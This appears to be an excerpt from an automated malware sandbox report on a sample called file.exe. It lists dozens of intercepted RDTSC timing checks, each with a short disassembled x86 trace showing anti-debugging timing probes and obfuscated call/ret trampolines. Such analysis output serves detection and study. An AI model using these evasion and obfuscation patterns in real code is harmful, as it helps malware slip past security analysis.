Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C98A6B second address: C98A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9817A second address: C9817E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9817E second address: C9818D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBCBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9818D second address: C98193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C98193 second address: C981A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F4DCCF8FBC6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C981A5 second address: C981AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C98761 second address: C98765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C98905 second address: C9890B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9890B second address: C98910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B017 second address: C9B01B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B01B second address: C9B076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4DCCF8FBD1h 0x0000000b popad 0x0000000c xor dword ptr [esp], 06D77B53h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F4DCCF8FBC8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d xor esi, 31EDB021h 0x00000033 call 00007F4DCCF8FBC9h 0x00000038 pushad 0x00000039 jg 00007F4DCCF8FBC8h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B076 second address: C9B088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F4DCCCB3CD8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B088 second address: C9B08D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B5D5 second address: C9B5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9BD47 second address: C9BD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9CF7B second address: C9CF80 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9E021 second address: C9E06D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4DCCF8FBD0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F4DCCF8FBD6h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 mov esi, dword ptr [ebp+122D2B9Ah] 0x00000019 mov edi, 47FCDF1Fh 0x0000001e push 00000000h 0x00000020 mov edi, dword ptr [ebp+122D2B5Eh] 0x00000026 mov dword ptr [ebp+12460F53h], esi 0x0000002c push eax 0x0000002d pushad 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9EBCE second address: C9EBD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9EBD4 second address: C9EBD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9FDE1 second address: C9FDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA52A4 second address: CA52A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9FDE5 second address: C9FDF3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4DCCCB3CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA52A8 second address: CA52DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBCAh 0x00000007 jmp 00007F4DCCF8FBCFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F4DCCF8FBD4h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA52DC second address: CA5302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DCCCB3CE9h 0x00000009 popad 0x0000000a jl 00007F4DCCCB3CE2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA5302 second address: CA5308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA5308 second address: CA5315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnl 00007F4DCCCB3CD6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5AF13 second address: C5AF18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5AF18 second address: C5AF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4DCCCB3CDFh 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA5923 second address: CA5951 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4DCCF8FBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jnp 00007F4DCCF8FBC6h 0x00000013 jmp 00007F4DCCF8FBD2h 0x00000018 popad 0x00000019 je 00007F4DCCF8FBCCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA5AA5 second address: CA5AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4DCCCB3CE3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6B4E second address: CA6B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA7B63 second address: CA7B6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6C31 second address: CA6C4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F4DCCF8FBC6h 0x00000009 ja 00007F4DCCF8FBC6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F4DCCF8FBC6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA9A74 second address: CA9A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8BD2 second address: CA8BF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA9A78 second address: CA9A7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8BF5 second address: CA8BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA9A7C second address: CA9A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F4DCCCB3CDCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CACC95 second address: CACD0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F4DCCF8FBC6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F4DCCF8FBC8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov edi, dword ptr [ebp+122DBCA5h] 0x00000031 mov edi, esi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007F4DCCF8FBC8h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f pushad 0x00000050 mov al, 8Fh 0x00000052 mov dx, CF84h 0x00000056 popad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b push edi 0x0000005c pop edi 0x0000005d jmp 00007F4DCCF8FBCFh 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CABD10 second address: CABD99 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4DCCCB3CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jno 00007F4DCCCB3CDEh 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D1EBCh], ecx 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov bx, 9B1Eh 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F4DCCCB3CD8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 movsx edi, ax 0x00000048 mov eax, dword ptr [ebp+122D0449h] 0x0000004e mov dword ptr [ebp+122D2976h], ebx 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push edi 0x00000059 call 00007F4DCCCB3CD8h 0x0000005e pop edi 0x0000005f mov dword ptr [esp+04h], edi 0x00000063 add dword ptr [esp+04h], 00000015h 0x0000006b inc edi 0x0000006c push edi 0x0000006d ret 0x0000006e pop edi 0x0000006f ret 0x00000070 push eax 0x00000071 push edx 0x00000072 je 00007F4DCCCB3CDCh 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAEBF9 second address: CAEC31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4DCCF8FBD9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0C81 second address: CB0C9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0C9A second address: CB0C9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB2DA9 second address: CB2DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE4h 0x00000007 jns 00007F4DCCCB3CD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAFE4A second address: CAFE57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAEDFA second address: CAEE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAFE57 second address: CAFE5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAFE5B second address: CAFE61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAFE61 second address: CAFE67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB4484 second address: CB4488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAFE67 second address: CAFF03 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4DCCF8FBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov ebx, dword ptr [ebp+122D1D73h] 0x00000013 mov dword ptr [ebp+122D23F3h], esi 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov ebx, 6E01E4D1h 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F4DCCF8FBC8h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 mov eax, dword ptr [ebp+122D1439h] 0x0000004c pushad 0x0000004d jmp 00007F4DCCF8FBCAh 0x00000052 add dword ptr [ebp+1245374Ch], edx 0x00000058 popad 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push ebx 0x0000005e call 00007F4DCCF8FBC8h 0x00000063 pop ebx 0x00000064 mov dword ptr [esp+04h], ebx 0x00000068 add dword ptr [esp+04h], 00000018h 0x00000070 inc ebx 0x00000071 push ebx 0x00000072 ret 0x00000073 pop ebx 0x00000074 ret 0x00000075 nop 0x00000076 jmp 00007F4DCCF8FBCAh 0x0000007b push eax 0x0000007c jnp 00007F4DCCF8FBD4h 0x00000082 push eax 0x00000083 push edx 0x00000084 je 00007F4DCCF8FBC6h 0x0000008a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB54D1 second address: CB54EC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4DCCCB3CDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jno 00007F4DCCCB3CD6h 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB4640 second address: CB4657 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4DCCF8FBC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jng 00007F4DCCF8FBC6h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB54EC second address: CB5556 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F4DCCCB3CE2h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F4DCCCB3CD8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a add dword ptr [ebp+122D1CF0h], eax 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F4DCCCB3CD8h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5556 second address: CB555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB57D7 second address: CB57DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBAE2A second address: CBAE30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBAE30 second address: CBAE36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C52997 second address: C5299D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5299D second address: C529DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DCCCB3CE5h 0x00000009 jnl 00007F4DCCCB3CD6h 0x0000000f popad 0x00000010 jmp 00007F4DCCCB3CDDh 0x00000015 push ecx 0x00000016 jmp 00007F4DCCCB3CDFh 0x0000001b pop ecx 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBC4FC second address: CBC501 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF494 second address: CBF4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DCCCB3CE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF4AC second address: CBF4B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF76E second address: CBF782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jne 00007F4DCCCB3CD6h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f popad 0x00000010 push edx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF782 second address: CBF78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC6141 second address: CC6147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC6147 second address: CC6162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4DCCF8FBD0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC6162 second address: CC618B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4DCCCB3CE0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC6294 second address: CC631B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4DCCF8FBCCh 0x00000008 jnc 00007F4DCCF8FBC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jno 00007F4DCCF8FBC8h 0x00000018 pushad 0x00000019 jg 00007F4DCCF8FBC6h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 popad 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007F4DCCF8FBD8h 0x0000002e jmp 00007F4DCCF8FBCCh 0x00000033 popad 0x00000034 push edx 0x00000035 jnl 00007F4DCCF8FBC6h 0x0000003b pop edx 0x0000003c popad 0x0000003d mov eax, dword ptr [eax] 0x0000003f push edx 0x00000040 jo 00007F4DCCF8FBCCh 0x00000046 jns 00007F4DCCF8FBC6h 0x0000004c pop edx 0x0000004d mov dword ptr [esp+04h], eax 0x00000051 pushad 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 jmp 00007F4DCCF8FBD2h 0x0000005a popad 0x0000005b push ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCB748 second address: CCB768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CDDh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4DCCCB3CDFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4F459 second address: C4F45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4F45F second address: C4F465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4F465 second address: C4F46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCABAB second address: CCABC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4DCCCB3CDCh 0x0000000a push ebx 0x0000000b jbe 00007F4DCCCB3CD6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCACE5 second address: CCACE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCACE9 second address: CCACED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCAE8A second address: CCAEA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F4DCCF8FBCDh 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCAEA1 second address: CCAEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4DCCCB3CD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCAEAB second address: CCAECA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F4DCCF8FBDFh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4DCCF8FBCDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCAECA second address: CCAECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCB01A second address: CCB01E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCB180 second address: CCB184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
